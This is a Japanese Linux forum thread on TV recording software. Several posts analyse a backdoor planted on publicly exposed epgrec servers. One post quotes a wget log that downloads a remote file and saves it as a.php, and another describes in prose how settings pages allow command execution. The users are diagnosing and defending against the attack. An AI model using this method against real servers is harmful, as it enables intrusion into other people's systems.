- 1 名前:login:Penguin [2010/12/27(月) 03:37:18 ID:KjTW6F+E]
- Linuxでのテレビ視聴・録画に関して、デジタル/アナログ問わず扱うスレッド
【関連スレ】
Linux でビデオ録画【六枚目】
pc11.2ch.net/test/read.cgi/linux/1193058543/
【自家製】MythTV Part.3【HDDビデオ】
pc11.2ch.net/test/read.cgi/linux/1223721998/
【BT878】Linuxでのキャプチャを語るスレ
pc11.2ch.net/test/read.cgi/linux/1017186805/
Linuxでfriio
pc11.2ch.net/test/read.cgi/linux/1213378360/
【前スレ】
【視聴・録画】Linuxでテレビ総合3【デジタル/アナログ】
hibari.2ch.net/test/read.cgi/linux/1269999876/
【過去スレ】
【視聴・録画】Linuxでテレビ総合2【デジタル/アナログ】
pc11.2ch.net/test/read.cgi/linux/1253880711/
【視聴・録画】Linuxでテレビ総合【デジタル/アナログ】
pc11.2ch.net/test/read.cgi/linux/1231189481/
Linuxでテレビを見る
pc11.2ch.net/test/read.cgi/linux/1013649811/
- 596 名前:login:Penguin mailto:sage [2011/04/15(金) 22:24:41.33 ID:YjwoISRp]
- ええっと、録画もエンコも一様ではないですが、動画は全て2chの二重音声で
音声ストリームは一つだけです
芝のアナログ、#のデジレコからCPRMをゴニョったもの、win上でキャプチャカードから録画したもの
全てにおいて「二重音声」の、「左右」振り分けが全く効きません
ffmpegやmplayer、win上のmedia player classicでは正常に振り分けできるのですが
- 597 名前:102 mailto:sage [2011/04/17(日) 01:27:42.03 ID:j9EmQZKh]
- wikiを更新しました。
>>537さんのMythTVの変更と>>566さんのffmpegの変更を
パッチとしてまとめてアップしました。
- 598 名前:login:Penguin mailto:sage [2011/04/19(火) 01:06:04.14 ID:P20ZvSec]
- a.phpについて
ttp://privatepaste.com/82ed178c01
- 599 名前:login:Penguin mailto:sage [2011/04/19(火) 01:14:58.98 ID:D9sqW1nm]
- VLCの音声関連は確かにおかしいけど、>>594,596の用語もいろいろ間違ってるから誤解を受ける
- 600 名前:login:Penguin mailto:sage [2011/04/19(火) 01:18:29.49 ID:qv9e7oGO]
- 別に間違ってない。音声周りは混とんとしてて用語すら統一されてないだけ
- 601 名前:login:Penguin mailto:sage [2011/04/19(火) 01:48:57.35 ID:/qzuTcu/]
- >>598
録画済一覧からこいつアニオタかよとか言われるのか
- 602 名前:login:Penguin mailto:sage [2011/04/19(火) 07:54:49.60 ID:vK36nHcp]
- >>598
おいこれちょっとやべえぞ
コマンド実行し放題じゃねーか。
- 603 名前:login:Penguin mailto:sage [2011/04/19(火) 08:02:43.73 ID:bXEBoLID]
- 何とか穏便な方法で管理者たちに警告できないものか
- 604 名前:login:Penguin [2011/04/19(火) 08:21:19.64 ID:3LjrFAvh]
- >>603
どこかのサイトのHPとかならメールとかで送るくらいか
- 605 名前:login:Penguin mailto:sage [2011/04/19(火) 13:56:52.23 ID:FY7iracE]
- この人たちはなんでこんなものに感染?したの?
- 606 名前:login:Penguin mailto:sage [2011/04/19(火) 14:01:24.94 ID:AIhYam/V]
- ・バックドアを使ってメールを送る
・バックドアを使ってTSをおいてるディレクトリにテキストファイルを置く
- 607 名前:login:Penguin mailto:sage [2011/04/19(火) 15:40:08.88 ID:Dzjls3QR]
- CDトレイを開く
- 608 名前:login:Penguin mailto:sage [2011/04/19(火) 16:30:57.99 ID:pRWRRuxP]
- 早めに気づいて良かった…
いやまあ載ってるんだけど
- 609 名前:login:Penguin [2011/04/19(火) 17:00:41.49 ID:MOhHgtHM]
- >>608
怪しいアクセスログとか探し出せないか?
- 610 名前:login:Penguin mailto:sage [2011/04/19(火) 17:32:11.73 ID:TMhCsS8p]
- ルーター越しで公開してるんだろ
ポートぐらい変えばいいと思うんだが
そんなレベルじゃ何ともならんのか?
- 611 名前:login:Penguin mailto:sage [2011/04/19(火) 17:34:13.33 ID:37NkW/zL]
- ヤられる原因を突き止めて直さないとダメでしょ
- 612 名前:login:Penguin mailto:sage [2011/04/19(火) 17:41:39.23 ID:Dzjls3QR]
- 外部に公開するような設定のまま運用しているから悪い。
何かに感染しているわけではない。
強いて言えば、epgrecやhttpdに感染しているとでも言うか。
- 613 名前:login:Penguin mailto:sage [2011/04/19(火) 18:10:30.15 ID:vK36nHcp]
- そもそもepgrec自体あんまり全体公開にするようなことってないとは思うけども。
ただ脆弱性を突かれた可能性があるからそれはepgrec側を修正したほうがいいと思う。
ま、ともかく、このまま気づかないままならずっと弄られ続けるわな。
- 614 名前:login:Penguin mailto:sage [2011/04/19(火) 18:58:44.47 ID:hIIjCZO5]
- こんなのやるのってどこのハッカーだよ・・・
うちに侵入されたときのログにはアメリカのIPアドレスが残ってたが
これだけじゃどこの奴がやったかわからんよな
- 615 名前:login:Penguin mailto:sage [2011/04/19(火) 18:59:05.54 ID:o/SEgA11]
- 徹子の部屋を毎日録画したりな
- 616 名前:login:Penguin mailto:sage [2011/04/19(火) 19:01:10.73 ID:3ArfjlNL]
- >>615
それはそれでどんなやつか興味ありすぎるぞ
- 617 名前:login:Penguin mailto:sage [2011/04/19(火) 19:10:40.15 ID:pRWRRuxP]
- --2011-02-22 13:09:31-- users.skynet.be/fa564557/acmd.txt
Resolving users.skynet.be... 195.238.0.64
Connecting to users.skynet.be|195.238.0.64|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1648 (1.6K) [text/plain]
Saving to: `/var/www/epgrec/thumbs/a.php'
- 618 名前:login:Penguin mailto:sage [2011/04/19(火) 19:13:13.70 ID:pRWRRuxP]
- 同じようなのがapacheのerror.logに何件か残ってた。なんでこんなログがエラーログに残ってるんだろ…
対応しそうなアクセスログはみつかんね。173.173.111.229がepgrec下をうろうろしてる感じ
>>573のブログにも同じIPあったね。privatepasteにリストが投稿されたのが24日だから犯人はこいつか
- 619 名前:login:Penguin mailto:sage [2011/04/19(火) 19:34:28.82 ID:vK36nHcp]
- >>614
それ詳しく
せめて進入に使ったファイル名がわからんと修正しようがないと思うぞ。
- 620 名前:login:Penguin mailto:sage [2011/04/19(火) 20:26:18.10 ID:8iws6v4P]
- httpdの設定をちゃんとしていないからじゃない?
そもそも、ちゃんと接続可能なアクセス元IPアドレスを指定していれば、こうはならない。
- 621 名前:login:Penguin mailto:sage [2011/04/19(火) 20:41:08.14 ID:vK36nHcp]
- そこはいろんな環境から接続する場合考えたら微妙かも。出先のWiFiから弄れないからね。
やるならBASIC認証でもいいから認証かけるのが一番。もちろん定番パスとかは回避すべきだが。
- 622 名前:login:Penguin mailto:sage [2011/04/19(火) 20:59:48.73 ID:y9KOZ3AJ]
- rootとられてるんなら
クラッカーが自分の接続ログを残さないように 変更したバイナリに置き換えるとかしてるかもしれないし
何されてるかわからんよね
localだけから接続できるようにして SSH経由でリモートからアクセスするようにとかはだめなのかな
- 623 名前:login:Penguin mailto:sage [2011/04/20(水) 00:07:31.56 ID:WorYCYbw]
- >>622
安易な本+外部からアクセスできる便利さのみの知識で、
やっちまった人たちなんだろ。
ssh とか、ローカルだけから接続できるようにとか言っても、
「日本語でおk?」という感じな人たちばっかりだと思うから、
誰でもアクセス可能なように公開されているものに、
どうされても文句は言えないな。
しゃーないと思う。
- 624 名前:login:Penguin mailto:sage [2011/04/20(水) 00:08:33.18 ID:WorYCYbw]
- あ、安易な本というのは、
Linux で PT2 + epgrec
という内容で書いたやつね。
- 625 名前:login:Penguin mailto:sage [2011/04/20(水) 00:19:31.42 ID:rpQl9SgO]
- 全ては電波利権のせいだな。
- 626 名前:login:Penguin mailto:sage [2011/04/20(水) 00:29:58.03 ID:hfgtg1jf]
- おっとここで素人見下し発言が出たっー
- 627 名前:login:Penguin mailto:sage [2011/04/20(水) 00:58:57.68 ID:iTOQ5O7p]
- まあちょっとホスト名が出てる鯖見てみたけど、ほとんど気づいてないのか、まだ見れる。
数件401認証かけたり、消えたりしてたが。
ただ・・・唯一.co.jpドメインのとこ、今回のバックドアは消えてるけど、epgrecそのままじゃ意味ないだろ・・・。
あと、epgrec全体公開だと著作権法違反で引っかかるかも。
公衆送信権侵害にあたる予感。認証かけても招き猫を見てる限りアウトだが。
- 628 名前:login:Penguin mailto:sage [2011/04/20(水) 09:00:57.26 ID:4/qfWnfP]
- ddで頭出しをするって言う説明があったけど実際どのようにしてコマンドを入力すればいいの?
- 629 名前:login:Penguin mailto:sage [2011/04/20(水) 09:33:18.44 ID:XW+iSkwT]
- dvbrec.py をぐぐってもこれ使ってる人のサイトは1個も出てこないんだが、
実は作者以外使ってないとか?
catコマンドで fuse_b25 から録画できるようにはなったが、
dvbrec.py が動かない。
それ以前に totem での視聴ができていないので、
gstreamer の設定が足りないんだろうとは思うが、
素の Ubuntu 10.10 に dvb_apps のドキュメントどおり設定してほんとに動くの?
それだと足りない設定がたくさんあったりする?
誰か解説してくれw
- 630 名前:login:Penguin mailto:sage [2011/04/20(水) 21:20:09.65 ID:u3bbg3Bf]
- >>627
>招き猫を見てる限り
どういう意味?
- 631 名前:login:Penguin mailto:sage [2011/04/20(水) 21:24:51.68 ID:iTOQ5O7p]
- すまんまねきTV裁判だった。猫は余計だ。
まあ、401認証なら問題ないとは思うが、完全フリーならまずいかもな
- 632 名前:login:Penguin mailto:sage [2011/04/20(水) 21:34:14.80 ID:u3bbg3Bf]
- >>631
了解。基本的に「誰でも見れる状態」にしてたらアウトに限り無く近いだわな。
「アドレスを別の人に教えたわけではない」っていうのがどこまで効果があるか、
ってところか。
悪意(犯罪性)がなければ、裁判沙汰までにはならんだろうし、
プロバイダ経由で注意が行くだけだろうとは思うけど。
- 633 名前:login:Penguin mailto:sage [2011/04/20(水) 22:20:19.88 ID:XW+iSkwT]
- dvbrec.py は誰も使ってないみたいだなw
しょうがないから録画コマンドを自作したよ。俺はこれで満足だからいいや。
tune.c と tssprit.c の作者に感謝。
- 634 名前:login:Penguin mailto:sage [2011/04/20(水) 23:54:38.92 ID:MWCIJ4IO]
- >>631
公衆回線使った時点でアウトじゃなかったっけ
- 635 名前:login:Penguin mailto:sage [2011/04/20(水) 23:56:24.97 ID:iTOQ5O7p]
- 公衆回線使ったらアウトという解釈もあるねー。ただそれならいろんなものが違法になるってこともあるし。
微妙なところ。
- 636 名前:login:Penguin mailto:sage [2011/04/21(木) 00:28:28.26 ID:I6sINZrh]
- >>634
認証かけてればOKでしょ。
とにかくなんか簡単でもいいからパスワードなり何なり設定して、
外部から不特定多数の人に見られなければOK。
もちろん、そのパスワードを外部に自ら公表したりしたらアウト。
- 637 名前:login:Penguin mailto:sage [2011/04/21(木) 00:58:28.31 ID:zlI/DgH6]
- >>636
その状況で敗訴したのが招きじゃなかったっけ
- 638 名前:login:Penguin mailto:sage [2011/04/21(木) 01:12:06.02 ID:I6sINZrh]
- >>637
いや、違うよ。まねきTV の裁判は、
「認証かけていたっていっても、誰でも(不特定多数の人が)契約できてサービスを
利用出来るわけから、結局、意味ねーじゃん。」ってことでNG。
パスワードかけて、不特定多数の人がパスワード入手できないよう管理していれば、OK.
- 639 名前:login:Penguin mailto:sage [2011/04/21(木) 01:14:38.89 ID:Q/Xr3QlY]
- やっぱり電波利権に問題がある。
- 640 名前:login:Penguin mailto:sage [2011/04/21(木) 01:15:04.63 ID:KK5d5ptm]
- 簡単に言えば、epgrec+PT2にパス掛けて認証つけた状態で、IDとパスを発行した状態か。
そりゃだめか。
- 641 名前:login:Penguin mailto:sage [2011/04/21(木) 01:20:53.40 ID:I6sINZrh]
- >>640
え?
IDとパスかけて、自分や家族しか使わなかったら、何も問題ないよ。
第三者が、IDやパスを知ることの出来ない状態なので、何も問題ない。
任意の第三者に対して、IDとパスワードを発行するような話であれば、
それは商用・無償に関わらずNG。これがまねきTV。
- 642 名前:login:Penguin mailto:sage [2011/04/21(木) 01:21:48.25 ID:KK5d5ptm]
- ああ、すまん。家族はもちろんおkだ。はしょりすぎた。
- 643 名前:login:Penguin mailto:sage [2011/04/21(木) 01:36:29.97 ID:I6sINZrh]
- >>639
まぁ、隠れ放送局(中継局?)みたいになっているからだろね。
地方局とかからクレームが来たとかかも?
規制業界は「ユーザーの利益」なんていうのはほとんど無視したサービスしかしない。
もし他の先進国みたいに規制が緩和されていたとしたら、また変わった結果になっていたかもね。
新興放送局は「まねきTVと同様のサービスを大いに結構」とするだろうし。
>>642
こっちこそちょっと早とちりしてレスしたみたいね。スマソ
- 644 名前:login:Penguin mailto:sage [2011/04/21(木) 02:19:41.83 ID:e0QXo0Ok]
- >情報を受信者からの求めに応じ自動的に送信する機能を有する装置は、
>これがあらかじめ設定された単一の機器宛てに送信する機能しか有しない場合であっても、
>当該装置を用いて行われる送信が自動公衆送信であるといえるときは、
>自動公衆送信装置に当たるというべきである。
だから、ID云々特定云々関係なしにアウトだろ。
大体まねきTVは不特定多数にID発行とかしてないんじゃ。
アンテナの提供とTVをネットで送信する装置を預かるだけのサービスじゃなかったか。
- 645 名前:login:Penguin mailto:sage [2011/04/21(木) 02:31:01.01 ID:QKLzonNW]
- いやさ、その業者と契約さえすればいいんだから、
契約相手は不特定多数となるって解釈だろ。
個人が個人的利用の範囲内で公衆回線を利用したって上記の業者には該当しないから
大丈夫だろ。
- 646 名前:login:Penguin mailto:sage [2011/04/21(木) 02:54:09.19 ID:QKLzonNW]
- 要するに公衆相手に送信する権利を保護するものなんだから、
個人が個人的利用の範囲で公衆回線使うのは適用外って話。
- 647 名前:login:Penguin mailto:sage [2011/04/21(木) 16:40:04.06 ID:e6BPE+hM]
- >>646
まぁそういうことだね。仮にパスワードかけてなかったとしても、
>>632 みたいに、プロバイダ経由で注意が行くだけってのが
現実にありそうなことだな。
ただ、パスワードとか付けてなかった場合は、
訴えられると大変なことになるから、辞めておいたほうがいいし、
今回みたいに epgrec にセキュリティホールがあれば、
ワームの餌食になる。
- 648 名前:login:Penguin mailto:sage [2011/04/21(木) 16:58:13.55 ID:zTP2rZfz]
- epgrec にセキュリティホールがあるのか?
単にALL公開しているだけのような
- 649 名前:login:Penguin mailto:sage [2011/04/21(木) 18:14:56.96 ID:AQftNs2+]
- まだあるとは断定されてないよ
ただepgrecが狙い撃ちされてるのは事実で手口からなんらかの脆弱性を利用してる可能性があるって段階
- 650 名前:login:Penguin mailto:sage [2011/04/21(木) 19:55:43.87 ID:KK5d5ptm]
- できれば、くらった人は怪しいログそのままうpしてくれないかなあ。
- 651 名前:login:Penguin mailto:sage [2011/04/21(木) 21:31:38.27 ID:rxKsS6J1]
- PHP詳しくないんであれなんだが、設定画面からapache権限で
任意のコマンドを実行できるようにみえる。
- 652 名前:login:Penguin mailto:sage [2011/04/21(木) 21:37:38.97 ID:KK5d5ptm]
- それはバックドア仕掛けられた後。
仕掛けられる前はそんなものない。
- 653 名前:login:Penguin mailto:sage [2011/04/21(木) 22:01:57.66 ID:e6BPE+hM]
- パッと考えてみた話ですまないが、
install ディレクトリにある step2.php アクセス出来るっしょ。
あれって結構危ない気がするなぁ。
コマンドのパス設定している所あたり特に。
ちゃんとパースして処理してるのかな?
まだソース見てないから良く解らんけど。
- 654 名前:login:Penguin mailto:sage [2011/04/21(木) 22:16:02.23 ID:vC3hNe7f]
- いーからバンバンMythTV使え
epgrecは終わコンなんだよ
- 655 名前:login:Penguin mailto:sage [2011/04/21(木) 22:20:17.71 ID:e6BPE+hM]
- あ、つーか、よく考えれば、コード見る以前の問題だわ。
完全にダメ。ちょっとまだ録画してるから確認する気にはならんけど、
1.多分実行ファイルのパス設定出来るところで、色々問題起こる。←下手すると、任意のコマンド実行される
2.MySQL接続パスワードがモロ見え。
つまり、「例えばsshのパスワードとMySQL接続のパスワードを一緒にしていて、かつ、
パスワードでsshログインできるような
おマヌケさんだったら、技術的な事擦る必要さえなく、速攻終わる。
とりあえず、インストール終わったあとは、installフォルダにアクセス絶対できなくすることだぬ。
- 656 名前:login:Penguin mailto:sage [2011/04/21(木) 22:56:09.39 ID:KK5d5ptm]
- あー。なんで今まで誰も気づかなかったんだろうかっていうくらいマヌケなとこだな。
MySQLのパス見れるのを確認。
あと、弄った後getepg.phpを踏んでwgetでファイル取得が動作してるのを確認。どこに保存されたかはまだ見てないが。
これじゃやられるわけだ。
- 657 名前:login:Penguin mailto:sage [2011/04/21(木) 23:22:25.27 ID:phZBQeiO]
- epgrecのdo-record.shをPT2用に、BSの場合は、ts→ps変換、地デジの場合はts→ps変換&ワンセグ切り出しまでやるように作ってみた。
(要、ffmpeg, tss.py, tss_lite)
www.taruki.com/~daicyan/upload/data/jb0052.zip
BSはまだあんまりテストできてないからなんか不具合あるかも。
- 658 名前:login:Penguin mailto:sage [2011/04/21(木) 23:55:50.41 ID:r8fTOyxC]
- 常識的に考えて、MySQLにはepgrecがアクセスするのに使うためだけのアカウントを作って、
そのアカウントには必要最低限の権限だけ与えて、パスワードは別にしとくだろ
さらに、そのepgrec専用アカウントはlocalhostからだけにしとく
自分用のアカウントとかMySQLのrootアカウントをepgrecにそのまま設定するアホなんていないだろー(棒
- 659 名前:login:Penguin mailto:sage [2011/04/21(木) 23:58:09.47 ID:KK5d5ptm]
- 調べてみた。
適当にinstall画面を少し弄ってgetepg.php踏んでコマンド実行、適当にwgetあたりでもやれば終わり。
そのときのカレントディレクトリはepgrecのディレクトリ。
とりあえず、適当にa.php置いて、wgetで所定位置におけることを確認した。
まあ、どこか適当に置いといてあとで削除やらなんやらした可能性もあるが。
- 660 名前:login:Penguin mailto:sage [2011/04/22(金) 00:01:49.44 ID:Uv9CbBp0]
- >>659
乙。とりあえず、installフォルダを消せってことか。
そろそろ>181の出番かと。どこいったw
- 661 名前:login:Penguin mailto:sage [2011/04/22(金) 00:10:00.88 ID:H/Basd47]
- ただ、これは設定の部分だから、最初はどうしようもないね。
まあインストール時にしか使わないんだし、全部終わったらstep*.phpを削除するようにすればいいだけの話だが。
- 662 名前:login:Penguin mailto:sage [2011/04/22(金) 00:11:38.97 ID:V0NC4HIs]
- >>659
ずいぶん大きな釣りバリだな
- 663 名前:login:Penguin mailto:sage [2011/04/22(金) 00:18:26.35 ID:gpT+B+gV]
- >>659
お疲れ様ー。シュタインズ・ゲートまで撮ったあとで、
俺も確認するわ。結局、フォームに入力された情報を、
何のチェックもしてなかったんだろうなぁ、って思ってたりw
ていうか、まだやられた人のログ見たわけでもないので、
他にも穴有るかもしれんね。
なんかファイル数が多いから全部確認する気がおきないので、
とりあえず応急処置だなぁ。
余計なアクセス減らすために、epgrecのパスも変えておこっと。
>>660
確かに>>181の出番だなww
- 664 名前:login:Penguin mailto:sage [2011/04/22(金) 06:19:08.86 ID:3IvmPGzB]
- 被害者のアホです
ログの冒頭にepgrec/postsettings.phpへのPOSTがありました。内容は取ってませんがリファラはepgrec/systemSetting.php
その後にa.phpへのアクセスがあるのでシステム設定いじられたのでしょう
Step2はsystemSetting.php呼んでるだけなので根本的に解決させるなら設定項目はconfig.phpに直に置きたいとこですね
- 665 名前:login:Penguin mailto:sage [2011/04/22(金) 07:20:20.24 ID:H/Basd47]
- あ、これじゃinstall消してもだめだな。
EPGRECを使わないか、自分で改造するとかか。
まあ、どっちにしろ何かしら認証なり制限なりかけるのが一番の防御策だけどね。
そもそも、外部からアクセスできる時点で法的にもまずいし。
これができてないから、こうなったんだけどさ。
- 666 名前:login:Penguin mailto:sage [2011/04/22(金) 11:41:18.96 ID:gpT+B+gV]
- >>665
確かめたよ。Install は関係ない。
っつーのも、設定は settings ディレクトリに保存しているから。
結局、もし外部からアクセス出来る状態にしたいのであれば、
上で出た著作権の話も含めて、epgrec ディレクトリ全体にに digest 認証かけることをオススメ
epgrec のディレクトリ名は、狙い撃ちされている可能性があるので変えたほうが良いが、
根本的な解決に放っていないので、とにかくepgrec全体に認証かけるべし。
- 667 名前:login:Penguin mailto:sage [2011/04/22(金) 13:42:43.80 ID:UCDl/1D0]
- >>666
>確かめたよ。Install は関係ない。
>っつーのも、設定は settings ディレクトリに保存しているから。
いやだからインストール時のスクリプトでsettings内の実行ファイルのパスを
好きに変更できるって話だろ。
>>664の場合は普通に環境設定画面からやられたっぽいけど。
- 668 名前:login:Penguin mailto:sage [2011/04/22(金) 14:30:53.94 ID:ukFQ1VGn]
- >>627
俺もねこまねの意味が知りたい
- 669 名前:login:Penguin mailto:sage [2011/04/22(金) 14:31:43.66 ID:ukFQ1VGn]
- >>668
なんだそりゃ・・・
まねき猫です
- 670 名前:login:Penguin mailto:sage [2011/04/22(金) 14:33:01.03 ID:ukFQ1VGn]
- しかも答えてるじゃん・・・
ゴメン死にたいわ
- 671 名前:login:Penguin mailto:sage [2011/04/22(金) 14:33:02.08 ID:qGQsyMXm]
- まねきTVでしょ?
www.manekitv.com/
- 672 名前:login:Penguin mailto:sage [2011/04/22(金) 15:35:17.04 ID:eclG8kdt]
- >>667
IPで振り分け+認証をかけてても対策する必要あり?
外部からの許可アドレスは1つしか許可してない上に定期的に変更してるんだけど、それでも足りないなら俺には大変だ。
- 673 名前:login:Penguin mailto:sage [2011/04/22(金) 17:30:34.39 ID:z70aSrsL]
- >>672
自宅に侵入されたらアウト
- 674 名前:login:Penguin mailto:sage [2011/04/22(金) 18:22:24.92 ID:gpT+B+gV]
- >>667
Installフォルダ削除しても a.php 設置できるのを確認したっつー話ね。
>>672
要するに、「悪意のある人が、epgrec ディレクトリにアクセス出来る状態ならアウト」
「IPで振り分け+認証」で、悪意のある人物が epgrec ディレクトリに
アクセス出来ない状態になれば問題ないよ。
- 675 名前:login:Penguin mailto:sage [2011/04/22(金) 20:23:14.42 ID:Uv9CbBp0]
- >>674
systemSetting.phpかな?
認証はともかくそんななんでも実行可能なような仕組みには
ならないほうがいいよね?
- 676 名前:login:Penguin mailto:sage [2011/04/22(金) 20:42:23.68 ID:gpT+B+gV]
- >>675
えっと、結局、Install/step[3,4].php と同じような動作(POSTされたデータを保存する)
してる奴があったらアウトってこと。例えば、postsettings.php がアウト。
他にも有るかもしれないけど、確認してません。(systemSetting.phpは、postsettings.php呼んでる)
結局、POSTされたデータを解析せずというか、セキュリティーチェックせずに、そのまま使ってるのが問題。
これが>>655 でいった、1.の問題で、
2.の問題は、もっと多いかと。MySQLのepgrec用に作ったデータあベースへのパスワードを、
多分ユーザパスワード、下手するとrootのパスと同じにしている人がいる可能性は結構あって、
root取られた人は、多分こっちが問題になるね。(ubuntuとかヤバげ?w)
で、こっちは、例えば、設定を保存しているファイル settings/config.xml を直接読める時点でアウト。
結局、epgrec 自体は、外部公開用には作られてないってことだね。
外部から動かしたい場合は、 epgrec の外側から鍵かけなきゃダメ。
- 677 名前:login:Penguin mailto:sage [2011/04/22(金) 21:19:31.97 ID:Uv9CbBp0]
- >>676
ふむふむ。1.はぐぐったら、escapeshellargとかすればいいのかな。
2みたいなのはいるのかw。それはさすがにw。
見えるとこには置かないとか認証は基本なんだろけど
よくわからない人たちがやられてるんだろうなー。
- 678 名前:login:Penguin mailto:sage [2011/04/23(土) 17:27:14.94 ID:k5TudnEH]
- 小便するのに毎日チンコ出すけどさ、
簡単にチンコ出せるからって公衆の面前でチンコ出したらイカンだろ。
- 679 名前:login:Penguin mailto:sage [2011/04/23(土) 17:38:25.36 ID:lXpguXtf]
- チンコ出すのを悪とする社会の方が悪い。
- 680 名前:login:Penguin mailto:sage [2011/04/23(土) 21:49:49.34 ID:Nhq4yLhX]
- そうだそうだ
- 681 名前:login:Penguin mailto:sage [2011/04/24(日) 02:18:49.04 ID:QmWcQhIi]
- >>676
>結局、epgrec 自体は、外部公開用には作られてないってことだね。
つかってみてそれに気づかないお前がアホってことだよ
- 682 名前:login:Penguin mailto:sage [2011/04/24(日) 02:33:45.01 ID:BODRBHI3]
- mythwebだって似たようなもんだわな
- 683 名前:login:Penguin mailto:sage [2011/04/24(日) 15:32:35.69 ID:9BFn5/hC]
- BonCasServerのLinux移植版を導入しようとしるのですが、以下の状態です。
原因の心当たりわかる方居らっしゃるでしょうか?
# ./bcs-perl.pl list
>>List of PC/SC card reader
SCM SCR 3310 NTTCom (21120651317975) 00 00
>>EOL
# ./bcs-perl.pl
Cannot open PCSC card:Unknown reader specified.
#
つづく
- 684 名前:683 mailto:sage [2011/04/24(日) 15:34:01.72 ID:9BFn5/hC]
- つづき
# pcsc_scan
PC/SC device scanner
V 1.4.16 (c) 2001-2009, Ludovic Rousseau <ludovic.rousseau@free.fr>
Compiled with PC/SC lite version: 1.5.3
Scanning present readers...
0: SCM SCR 3310 NTTCom (21120651317975) 00 00
Sun Apr 24 15:20:32 2011
Reader 0: SCM SCR 3310 NTTCom (21120651317975) 00 00
Card state: Card inserted,
ATR: 3B F0 12 00 FF 91 81 B1 7C 45 1F 03 99
つづく2
- 685 名前:683 mailto:sage [2011/04/24(日) 15:34:23.84 ID:9BFn5/hC]
- つづき2
ATR: 3B F0 12 00 FF 91 81 B1 7C 45 1F 03 99
+ TS = 3B --> Direct Convention
+ T0 = F0, Y(1): 1111, K: 0 (historical bytes)
TA(1) = 12 --> Fi=372, Di=2, 186 cycles/ETU
21505 bits/s at 4 MHz, fMax for Fi = 5 MHz => 26881 bits/s
TB(1) = 00 --> VPP is not electrically connected
TC(1) = FF --> Extra guard time: 255 (special value)
TD(1) = 91 --> Y(i+1) = 1001, Protocol T = 1
-----
TA(2) = 81 --> Protocol to be used in spec mode: T=1 - Unable to change - defined by interface bytes
TD(2) = B1 --> Y(i+1) = 1011, Protocol T = 1
-----
TA(3) = 7C --> IFSC: 124
TB(3) = 45 --> Block Waiting Integer: 4 - Character Waiting Integer: 5
TD(3) = 1F --> Y(i+1) = 0001, Protocol T = 15 - Global interface bytes following
-----
TA(4) = 03 --> Clock stop: not supported - Class accepted by the card: (3G) A 5V B 3V
+ Historical bytes:
+ TCK = 99 (correct checksum)
Possibly identified card (using /usr/share/pcsc/smartcard_list.txt):
3B F0 12 00 FF 91 81 B1 7C 45 1F 03 99
Japanese Chijou Digital B-CAS Card (pay TV)
^C
#
- 686 名前:login:Penguin mailto:sage [2011/04/24(日) 16:06:26.46 ID:gRp/ScBf]
- >>683
ccidのバージョンは?
1.4以上だと駄目な状態ってまだ続いてるのかな
- 687 名前:683 mailto:sage [2011/04/24(日) 16:25:56.74 ID:9BFn5/hC]
- >>686
ありがとうございます。
libccidのバージョンは1.3.11-1
pcscdのバージョンは1.5.3-1ubuntu4.1
です。もしかすると何か必要なモジュールのインストールが足りていないのかも・・・?
- 688 名前:login:Penguin mailto:sage [2011/04/25(月) 21:54:06.68 ID:hxO3d2Ue]
- MythTVの録画が安定しない…
ISDB版も不安定だし、fuse_b25はよく落ちるし、pcscdもたまにエラー出てるし
他の人は安定してるのかな?
- 689 名前: 忍法帖【Lv=23,xxxPT】 【東電 77.5 %】 mailto:sage [2011/04/25(月) 22:49:53.31 ID:WhdKCjSO]
- >>688
うちの環境は特に大きな問題なく、けっこう安定しているけどなぁ〜?
番組表取得にepgdump使っているんですけどね。
- 690 名前:login:Penguin mailto:sage [2011/04/26(火) 03:37:37.24 ID:8vAJ2b2t]
- epgrecの録画済み一覧を手軽に全て消去するにはどうしたらいいの?
データを他に写し終えた後の不要なリンクが1年分近く残っていて手でチマチマ消すのは辛すぎ。
- 691 名前:login:Penguin mailto:sage [2011/04/26(火) 03:56:35.32 ID:horrRmnu]
- DELETE FROM Recorder_reserveTbl WHERE complete=1;
- 692 名前:login:Penguin mailto:sage [2011/04/26(火) 04:11:33.43 ID:8vAJ2b2t]
- >>691
早速の回答ありがとです。
でも・・・わからないです。すみません。
調べてトライします。
- 693 名前:login:Penguin mailto:sage [2011/04/26(火) 07:41:11.66 ID:e7a4WTyk]
- >>690
外部に公開してくれて、a.php を設置してくれたら、
こっちでやってあげても (ry
- 694 名前:login:Penguin mailto:sage [2011/04/26(火) 07:46:28.51 ID:LKlFH8Ws]
- その後何故か「囲碁の時間」が延々と録画されるわけですね、わかります
- 695 名前:login:Penguin mailto:sage [2011/04/26(火) 07:58:12.71 ID:M8xlO357]
- 普通に囲碁の時間とNHK杯まで録画してる俺を馬鹿にしたんか
- 696 名前:login:Penguin mailto:sage [2011/04/26(火) 11:00:21.37 ID:uCYYe3ff]
- ジュービョォー・・・
|
 |
